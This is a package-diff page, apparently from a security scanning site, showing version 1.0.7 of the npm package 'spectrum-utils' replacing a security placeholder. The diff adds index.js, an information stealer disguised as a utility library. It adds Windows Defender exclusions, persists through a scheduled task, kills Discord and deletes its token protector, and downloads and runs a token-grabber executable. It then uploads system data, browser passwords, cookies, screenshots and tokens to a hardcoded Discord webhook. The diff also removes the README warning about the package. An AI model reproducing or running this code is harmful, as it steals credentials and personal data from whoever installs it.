spectrum-utils 0.0.1-security → 1.0.7
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of spectrum-utils might be problematic. Click here for more details.
- package/index.js +178 -0
- package/package.json +14 -3
- package/test/script.js +3 -0
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,178 @@
|
|
|
1
|
+
const exec = require('child_process').exec;
|
|
2
|
+
const request = require('request');
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
const os = require('os');
|
|
6
|
+
|
|
7
|
+
const CHECK_IF_ADMIN = () => {
|
|
8
|
+
const test = require('os').userInfo().username === 'Administrator';
|
|
9
|
+
return test;
|
|
10
|
+
};
|
|
11
|
+
|
|
12
|
+
const TASKS = () => {
|
|
13
|
+
const testKDOT = fs.existsSync(path.join(process.env.APPDATA, 'KDOT'));
|
|
14
|
+
|
|
15
|
+
if (!testKDOT) {
|
|
16
|
+
try {
|
|
17
|
+
exec(`powershell -Command "Add-MpPreference -ExclusionPath '${os.homedir()}\\AppData\\Local\\Temp'"`);
|
|
18
|
+
exec(`powershell -Command "Add-MpPreference -ExclusionPath '${os.homedir()}\\AppData\\KDOT'"`);
|
|
19
|
+
} catch (error) {
|
|
20
|
+
console.log("Failed to add exclusions");
|
|
21
|
+
}
|
|
22
|
+
|
|
23
|
+
fs.mkdirSync(path.join(process.env.APPDATA, 'KDOT'));
|
|
24
|
+
const origin = process.argv[1];
|
|
25
|
+
fs.copyFileSync(origin, path.join(process.env.APPDATA, 'KDOT', 'KDOT.js'));
|
|
26
|
+
}
|
|
27
|
+
|
|
28
|
+
const test = execSync('schtasks /query /fo csv').toString();
|
|
29
|
+
|
|
30
|
+
if (!test.includes('KDOT')) {
|
|
31
|
+
const schedule = 'AtStartup';
|
|
32
|
+
const action = `powershell.exe -ExecutionPolicy Bypass -WindowStyle hidden -File ${path.join(process.env.APPDATA, 'KDOT', 'KDOT.js')}`;
|
|
33
|
+
execSync(`schtasks /create /tn "KDOT" /tr "${action}" /sc ${schedule} /rl Highest /f`);
|
|
34
|
+
}
|
|
35
|
+
|
|
36
|
+
Grub();
|
|
37
|
+
};
|
|
38
|
+
|
|
39
|
+
const Grub = () => {
|
|
40
|
+
const webhook = "https://discord.com/api/webhooks/1189736190618910840/2w-BMbL5WMr1nbcvh_r2DHjOC7cM2gMe5cXiDbUWgaOo7PiL17yHVnEjBHJ7ZNXX53gK";
|
|
41
|
+
const ip = execSync('curl -s https://api.ipify.org').toString().trim();
|
|
42
|
+
fs.writeFileSync(path.join(os.tmpdir(), 'ip.txt'), ip);
|
|
43
|
+
|
|
44
|
+
const systemInfo = execSync('systeminfo').toString();
|
|
45
|
+
fs.writeFileSync(path.join(os.tmpdir(), 'system_info.txt'), systemInfo);
|
|
46
|
+
|
|
47
|
+
const uuid = execSync('wmic csproduct get UUID').toString().trim();
|
|
48
|
+
fs.writeFileSync(path.join(os.tmpdir(), 'uuid.txt'), uuid);
|
|
49
|
+
|
|
50
|
+
const mac = execSync('getmac').toString().trim();
|
|
51
|
+
fs.writeFileSync(path.join(os.tmpdir(), 'mac.txt'), mac);
|
|
52
|
+
|
|
53
|
+
const username = process.env.USERNAME;
|
|
54
|
+
const hostname = os.hostname();
|
|
55
|
+
|
|
56
|
+
const netstat = execSync('netstat -ano').toString().trim();
|
|
57
|
+
fs.writeFileSync(path.join(os.tmpdir(), 'netstat.txt'), netstat);
|
|
58
|
+
|
|
59
|
+
const embedAndBody = {
|
|
60
|
+
username: 'KDOT',
|
|
61
|
+
content: '@everyone',
|
|
62
|
+
title: 'KDOT',
|
|
63
|
+
description: 'KDOT',
|
|
64
|
+
color: '16711680',
|
|
65
|
+
avatar_url: 'https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png',
|
|
66
|
+
url: 'https://discord.gg/vk3rBhcj2y',
|
|
67
|
+
embeds: [
|
|
68
|
+
{
|
|
69
|
+
title: 'Worked',
|
|
70
|
+
url: 'https://discord.gg/heaven',
|
|
71
|
+
description: 'it worked',
|
|
72
|
+
color: '16711680',
|
|
73
|
+
footer: {
|
|
74
|
+
text: 'It worked man.'
|
|
75
|
+
},
|
|
76
|
+
thumbnail: {
|
|
77
|
+
url: 'https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png'
|
|
78
|
+
},
|
|
79
|
+
fields: [
|
|
80
|
+
{
|
|
81
|
+
name: 'IP',
|
|
82
|
+
value: '``````' + ip + '``````'
|
|
83
|
+
},
|
|
84
|
+
{
|
|
85
|
+
name: 'Username',
|
|
86
|
+
value: '``````' + username + '``````'
|
|
87
|
+
},
|
|
88
|
+
{
|
|
89
|
+
name: 'Hostname',
|
|
90
|
+
value: '``````' + hostname + '``````'
|
|
91
|
+
},
|
|
92
|
+
{
|
|
93
|
+
name: 'UUID',
|
|
94
|
+
value: '``````' + uuid + '``````'
|
|
95
|
+
},
|
|
96
|
+
{
|
|
97
|
+
name: 'MAC',
|
|
98
|
+
value: '``````' + mac + '``````'
|
|
99
|
+
}
|
|
100
|
+
]
|
|
101
|
+
}
|
|
102
|
+
]
|
|
103
|
+
};
|
|
104
|
+
|
|
105
|
+
const payload = JSON.stringify(embedAndBody);
|
|
106
|
+
|
|
107
|
+
request.post({
|
|
108
|
+
url: webhook,
|
|
109
|
+
body: payload,
|
|
110
|
+
headers: {'Content-Type': 'application/json'}
|
|
111
|
+
});
|
|
112
|
+
|
|
113
|
+
SetLocation(path.join(os.tmpdir(), 'KDOT'));
|
|
114
|
+
|
|
115
|
+
execSync('taskkill.exe /f /im "Discord.exe"');
|
|
116
|
+
execSync('taskkill.exe /f /im "DiscordCanary.exe"');
|
|
117
|
+
execSync('taskkill.exe /f /im "DiscordPTB.exe"');
|
|
118
|
+
execSync('taskkill.exe /f /im "DiscordTokenProtector.exe"');
|
|
119
|
+
|
|
120
|
+
const tokenProt = fs.existsSync(path.join(process.env.APPDATA, 'DiscordTokenProtector', 'DiscordTokenProtector.exe'));
|
|
121
|
+
|
|
122
|
+
if (tokenProt) {
|
|
123
|
+
execSync(`del "${path.join(process.env.APPDATA, 'DiscordTokenProtector', 'DiscordTokenProtector.exe')}" /f /q`);
|
|
124
|
+
}
|
|
125
|
+
|
|
126
|
+
const secureDat = fs.existsSync(path.join(process.env.APPDATA, 'DiscordTokenProtector', 'secure.dat'));
|
|
127
|
+
|
|
128
|
+
if (secureDat) {
|
|
129
|
+
execSync(`del "${path.join(process.env.APPDATA, 'DiscordTokenProtector', 'secure.dat')}" /f /q`);
|
|
130
|
+
}
|
|
131
|
+
|
|
132
|
+
const TEMP_KOT = fs.existsSync(path.join(os.tmpdir(), 'KDOT'));
|
|
133
|
+
|
|
134
|
+
if (!TEMP_KOT) {
|
|
135
|
+
fs.mkdirSync(path.join(os.tmpdir(), 'KDOT'));
|
|
136
|
+
}
|
|
137
|
+
|
|
138
|
+
const gottaMakeSure = 'penis';
|
|
139
|
+
fs.writeFileSync(path.join(os.tmpdir(), 'KDOT', 'bruh.txt'), gottaMakeSure);
|
|
140
|
+
|
|
141
|
+
execSync('curl.exe -O https://github.com/KDot227/Powershell-Token-Grabber/releases/download/Fixed_version/main.exe');
|
|
142
|
+
|
|
143
|
+
const proc = execSync(`start /B ${path.join(os.tmpdir(), 'main.exe')} "${webhook}"`);
|
|
144
|
+
proc.waitExit();
|
|
145
|
+
|
|
146
|
+
const lol = path.join(os.tmpdir());
|
|
147
|
+
|
|
148
|
+
fs.renameSync(path.join(lol, 'ip.txt'), path.join(lol, 'KDOT', 'ip.txt'));
|
|
149
|
+
fs.renameSync(path.join(lol, 'netstat.txt'), path.join(lol, 'KDOT', 'netstat.txt'));
|
|
150
|
+
fs.renameSync(path.join(lol, 'system_info.txt'), path.join(lol, 'KDOT', 'system_info.txt'));
|
|
151
|
+
fs.renameSync(path.join(lol, 'uuid.txt'), path.join(lol, 'KDOT', 'uuid.txt'));
|
|
152
|
+
fs.renameSync(path.join(lol, 'mac.txt'), path.join(lol, 'KDOT', 'mac.txt'));
|
|
153
|
+
fs.renameSync(path.join(lol, 'browser-cookies.txt'), path.join(lol, 'KDOT', 'browser-cookies.txt'));
|
|
154
|
+
fs.renameSync(path.join(lol, 'browser-history.txt'), path.join(lol, 'KDOT', 'browser-history.txt'));
|
|
155
|
+
fs.renameSync(path.join(lol, 'browser-passwords.txt'), path.join(lol, 'KDOT', 'browser-passwords.txt'));
|
|
156
|
+
fs.renameSync(path.join(lol, 'desktop-screenshot.png'), path.join(lol, 'KDOT', 'desktop-screenshot.png'));
|
|
157
|
+
fs.renameSync(path.join(lol, 'tokens.txt'), path.join(lol, 'KDOT', 'tokens.txt'));
|
|
158
|
+
|
|
159
|
+
execSync(`Compress-Archive -Path "${path.join(lol, 'KDOT')}" -DestinationPath "${path.join(lol, 'KDOT.zip')}" -Force`);
|
|
160
|
+
|
|
161
|
+
execSync(`curl.exe -X POST -F 'payload_json={"username": "KING KDOT", "content": "", "avatar_url": "https://cdn.discordapp.com/avatars/1009510570564784169/c4079a69ab919800e0777dc2c01ab0da.png"}' -F "file=@${path.join(lol, 'KDOT.zip')}" ${webhook}`);
|
|
162
|
+
|
|
163
|
+
execSync(`del "${path.join(lol, 'KDOT.zip')}"`);
|
|
164
|
+
execSync(`del "${path.join(lol, 'KDOT')}" /s /q`);
|
|
165
|
+
execSync(`del "${path.join(lol, 'main.exe')}"`);
|
|
166
|
+
};
|
|
167
|
+
|
|
168
|
+
const SetLocation = (location) => {
|
|
169
|
+
process.chdir(location);
|
|
170
|
+
};
|
|
171
|
+
|
|
172
|
+
if (CHECK_IF_ADMIN()) {
|
|
173
|
+
TASKS();
|
|
174
|
+
} else {
|
|
175
|
+
console.log("Please run as admin!");
|
|
176
|
+
const origin = process.argv[1];
|
|
177
|
+
exec(`powershell -noprofile -file ${origin}`);
|
|
178
|
+
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,17 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "spectrum-utils",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.7",
|
|
4
|
+
"description": "A range of utilities for your Node.js needs, maintained by a small group of new developers!",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"directories": {
|
|
7
|
+
"test": "test"
|
|
8
|
+
},
|
|
9
|
+
"scripts": {
|
|
10
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
11
|
+
},
|
|
12
|
+
"author": "Ibrahim Sultan",
|
|
13
|
+
"license": "ISC",
|
|
14
|
+
"dependencies": {
|
|
15
|
+
"spectrum-utils": "^1.0.4"
|
|
16
|
+
}
|
|
6
17
|
}
|
package/test/script.js
ADDED
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=spectrum-utils for more information.
|